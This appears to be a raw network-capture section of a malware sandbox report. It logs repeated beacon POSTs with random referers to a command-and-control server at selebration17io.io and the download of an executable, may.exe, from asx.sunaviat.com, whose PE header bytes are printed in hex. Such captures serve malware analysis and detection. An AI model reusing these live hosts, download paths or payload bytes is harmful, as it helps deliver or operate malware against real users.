36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:08:47.388216019 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://mrwhdfdlqcdctl.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 179
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:47.643639088 CET240INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:47 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 86 09 9f 47 c7 f8 01 b5 20 f0 3e 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 34Uys/~(`:G >Z8)eYf}j~/0
                                                                                                                                                                    Feb 8, 2024 19:08:52.130063057 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://klnyltwregbfqf.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 206
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:52.385663986 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:08:52.400477886 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://cxoxerrlmha.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 260
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:52.657411098 CET259INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                                                                                                                                                                    Feb 8, 2024 19:08:58.756895065 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://lmbuwfrjitsh.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 155
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:59.012209892 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:08:59.020495892 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://xyhdvnxgdunco.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 157
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:59.276103020 CET232INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                                                                                                                                                                    Feb 8, 2024 19:09:05.234725952 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://fugsnilkbusag.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 335
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:09:05.491492987 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:09:05.524791002 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://iqiitbwdqugrkbnv.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 258
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:09:05.781099081 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 2d 5b e3 1b 34 c4 f5 72 98 94 0e be 44 07 d2 7d ae b1 4f 5c b8 39 3f 74 3d 05 f0 ff 6c f7 d4 bd 0c de 3e cb 96 df b0 ca 36 50 ca b2 e7 f5 b6 70 ba e2 5f f1 cb a6 da a6 f7 31 22 53 65 7e 3c cd cc ea 2e 28 7e 36 aa db b9 27 2e d5 4e 95 fe 5e bf 6c 13 d9 a5 e2 bf c4 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 5b 53 90 dc 84 fd 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5f db c4 29 11 13 bf 2a 9a 90 24 08 4f c5 a5 b5 cb a1 61 6e de f5 69 f9 1b 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a a4 43 7e 88 2c c8 48 d2 a2 c3 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf e8 f7 1a 54 9b 4a d8 19 fe b1 4d 0b 65 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb ac ce 46 c1 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 79 39 ea e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 6d 7c a3 90 4e b1 54 55 a5 aa b5 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 30 18 06 f1 2c 1e ac 03 5b d7 1f e4 a6 55 12 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 1c 0d b9 e2 2b 29 b6 bb 01 64 17 28 d2 f4 44 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 57 90 26 48 c4 3a 96 31 cb e7 17 3f cc 98 7c 4d a4 70 d4 03 93 ae 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 dc a6 a7 5f 29 43 43 51 5c 03 62 18 1a 60 fa 40 a0 ae 88 c1 be a3 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 d5 1e cb 67 f5 e8 19 1f 88 b9 8c f5 28 ea 50 b9 c3 ea 9e 13 6c ba 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 42 68 0b 2d 03 81 96 7f dc 2e 27 9d 9f 41 40 56 64 de 9e 73 89 b4 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 be b1 8e 58 43 6a 2d 40 b3 e9 f3 32 72 de 39 16 12 17 76 eb 17 0e 8d e3 51 aa b0 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 51 8f 69 b9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d d8 c6 f2 89 f0 0f cc 89 f1 b5 e8 c1 d2 27 ab 35 a4 36 6c 12 c5 2d b4 25 d7 95 38 c4 07 9c 69 de 85 8f 83 05 4b f2 8d dd 56 a9 2d 42 7f 89 ce bc ad 53 43 6e fe 0b 1c 32 8a ad 0b 8b f4 07 6b fb 27 82 36 00 00 c1 90 27 91 8c 47 81 aa
                                                                                                                                                                    Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*-[4rD}O\9?t=l>6Pp_1"Se~<.(~6'.N^l3Ob>!Z:V?sB[SR+{Es_)*$Oani~_TzO,%QaC~,HJlk?aMF$l3l9|~qTJMeLuVW;*r#u1yr+Lc1<'iFHU=hU@W$y9(B@w=fd0QpKm|NTUo)2([T&}Wbo~=h0,[Ut9Pmbz+)d(Dzk7@W&H:1?|Mpvn%.ug#_)CCQ\b`@3%}/#l6g(PlLEsCRZXyBh-.'A@Vdse%x`80_xXCj-@2r9vQ=TZ\Z_Qi9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c='56l-%8iKV-BSCn2k'6'G
                                                                                                                                                                    Feb 8, 2024 19:09:08.021188021 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://bwyivyicdwojw.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 289
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:09:08.276134968 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:08 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.349717172.67.221.3580640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:08:47.917371988 CET170OUTGET /data/pdf/may.exe HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: asx.sunaviat.com
                                                                                                                                                                    Feb 8, 2024 19:08:48.287235022 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:48 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 8336105
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Content-Description: File Transfer
                                                                                                                                                                    Content-Disposition: attachment; filename=may.exe
                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: must-revalidate
                                                                                                                                                                    Pragma: public
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mCoei8lNrl3V4iCWf4c5QpfPaxjOGIrvwhmRcJDjudbZNV2tq%2ByvM6X7HEyevUrRrm4Bib8uE6pIvJwtrUch5ZQEbBTS9HxRXYuQowca3Ln6st3dtuwViaHjol%2FgMyrwR9Aj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d1ebdad3b0b5-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
